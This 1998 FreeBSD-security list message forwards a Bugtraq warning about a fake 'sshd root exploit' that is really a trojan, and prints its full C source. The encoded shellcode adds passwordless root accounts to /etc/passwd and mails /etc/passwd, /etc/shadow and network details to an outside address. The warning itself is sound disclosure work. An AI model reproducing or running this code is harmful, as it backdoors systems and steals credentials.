From owner-freebsd-security Mon Nov 16 09:31:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA04686 for freebsd-security-outgoing; Mon, 16 Nov 1998 09:31:44 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from heidegger.uol.com.br (heidegger.uol.com.br [200.230.198.88]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA04574 for ; Mon, 16 Nov 1998 09:30:53 -0800 (PST) (envelope-from agora@agoractvm.com.br) Received: from agoractvm.com.br ([200.255.84.180]) by heidegger.uol.com.br (8.9.1/8.9.1) with ESMTP id PAA01898; Mon, 16 Nov 1998 15:28:04 -0200 (EDT) Message-ID: <36505EFA.935A91A5@agoractvm.com.br> Date: Mon, 16 Nov 1998 15:20:58 -0200 From: =?iso-8859-1?Q?Teleinform=E1tica?= Reply-To: agora@uol.com.br Organization: =?iso-8859-1?Q?=C1GORA?= C.T.V.M. S/A X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Best of Security CC: Cristiano Colpani , FreeBSD Security , Guilherme Galileo Cox , in0x , "Nilson R. A. de Brito" Subject: [Fwd: Administrivia] Content-Type: multipart/mixed; boundary="------------7C86B669E4356C12030145B7" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------7C86B669E4356C12030145B7 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit -- Regards, _______________________ | Nelson 'Stderr' Brito |_________________________________ |_________________________________________________________| |Finger Print: | A2E0 D90E 413A 515A 10C9 C0CE 4855 D523 | | E-mail: | nelson@cyberspace.org | | URL: | http://www.angelfire.com/sd/stderr | | Public key: | See the URL | |______________|__________________________________________| |ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ --------------7C86B669E4356C12030145B7 Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Received: by pascal (mbox agora) (with Cubic Circle's cucipop (v1.22 1998/04/11) Mon Nov 16 15:22:08 1998) X-From_: root Mon Nov 16 15:15:59 1998 Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by pascal.uol.com.br (8.9.1/8.9.1) with ESMTP id PAA15931; Mon, 16 Nov 1998 15:15:47 -0200 (EDT) Received: from netspace.org ([128.148.157.6]:9036 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <1487-3110>; Mon, 16 Nov 1998 11:54:32 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4992099 for BUGTRAQ@NETSPACE.ORG; Mon, 16 Nov 1998 11:48:03 -0500 Approved-By: aleph1@DFW.NET Received: from mhub3.tc.umn.edu (mhub3.tc.umn.edu [128.101.131.43]) by netspace.org (8.8.7/8.8.7) with SMTP id DAA21995 for ; Sun, 15 Nov 1998 03:32:00 -0500 Received: from moby.jaws.umn.edu by mhub3.tc.umn.edu with ESMTP; Sun, 15 Nov 1998 02:31:59 -0600 Received: (from tobkin@localhost) by moby.jaws.umn.edu (8.9.1/8.9.1) id CAA03974; Sun, 15 Nov 1998 02:31:59 -0600 (CST) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-ID: <199811150831.CAA03974@moby.jaws.umn.edu> Date: Sun, 15 Nov 1998 02:31:58 -0600 Reply-To: Chris Tobkin Sender: Bugtraq List From: Chris Tobkin Subject: Re: Administrivia To: BUGTRAQ@netspace.org In-Reply-To: from "Aleph One" at Nov 14, 98 07:03:31 pm X-Mozilla-Status2: 00000000 Speaking of trojans/lame scripts, there is a 'root exploit for Linux 2.0.* and possibly 2.1.* SSHD 1.5-1.2.23' going around on some of the efnet channels.. It is actually a spiffed up c script that does: echo b4b0::0:0::/:>>/etc/passwd;echo babo::10:10::/: >> /etc/passwd ; (cat /etc/passwd /etc/shadow ;/sbin/ifconfig)|mail kitandjp@hotmail.com /bin/sh If one were to just print out the shellcode this would be immediately obvious. (i.e. printf(""); pipe it through strings to get rid of the control characters..) The filenames that it is been being passed around as are "sshdexp.c" and the "sshdwarez.c" which was already referenced on bugtraq... other people can rip this one to shreds with the fetch() which is cute.. and the system("/bin/echo") instead of printf(""). This is, however, a good way to get rid of scriptkiddies that don't know how to write code but want all the benefits of everyone elses's intelligence.. Caveat emptor, again. // chris tobkin@umn.edu ************************************************************************* Chris Tobkin tobkin@umn.edu Java and Web Services - Academic and Distributed Computing Services - UMN ----------------------------------------------------------------------- "Thanks to the printing press, the deviant smart people were able to distribute their genius without having to pass it on genetically. Evolution was short-circuited. We gained knowlege and technology without gaining intelligence." - Scott Addams ************************************************************************* -- sshdtrojan.c -- /************************************************************************/ /* root exploit for Linux 2.0.* and possible 2.1.* SSHD 1.5-1.2.23 */ /* On some weird systems this causes a segfault */ /* If it doesnt work change the offset (usually between 0 and 5000) */ /* (try increments of 2.......) */ /* TO RUN: */ /* (./sshdwarez ; cat) | nc victim 22 */ /* */ /* forever yours: st4n@zdnetmail.com */ /************************************************************************/ #include #include #include #define OFFSET 146 #define NOP 0x90 char shellcode[] = "\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x62\x34\x62\x30\x3a\x3a\x30\x3a" "\x30\x3a\x3a\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77" "\x64\x3b\x65\x63\x68\x6f\x20\x62\x61\x62\x6f\x3a\x3a\x31\x30\x3a\x31" "\x30\x3a\x3a\x2f\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73" "\x73\x77\x64\x20\x3b\x20\x28\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" "\x61\x73\x73\x77\x64\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77" "\x20\x3b\x2f\x73\x62\x69\x6e\x2f\x69\x66\x63\x6f\x6e\x66\x69\x67\x29" "\x7c\x6d\x61\x69\x6c\x20\x6b\x69\x74\x61\x6e\x64\x6a\x70\x40\x68\x6f" "\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x00\xeb\x1f\x5e\x89\x76\x08\x31" "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; int fetch(int *w){ /* push and return something from the stack */ char stack[4096]; int (*push)(); memcpy((int*)&push,w,sizeof(int)); memcpy(stack,(char*)w+4,OFFSET-5); push(stack); return *w; } int i; char *p; main(int argc,char**argv) { char s[1024]; char ssh[] = "\x8c\xfd\xff\xbf\x48\x9b"; /* starts ssh session */ strcpy(argv[0],"vi "); if (getuid()) { system("/bin/echo this program uses priveledged ports. " "run as root."); return -1; } write(1,ssh,sizeof(ssh)); for (i=0;i<500;i++) s[i]=NOP; p=&s[i]; memcpy(p,&shellcode[OFFSET],sizeof(shellcode)-OFFSET); /* most [linux] systems keep libc functions in the same place */ i=(int)system;memcpy(&shellcode,&i,sizeof(int)); write(1,s,500+(sizeof(shellcode)-OFFSET)); fetch((int*)&shellcode); usleep(1000000); return 0; } --------------7C86B669E4356C12030145B7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message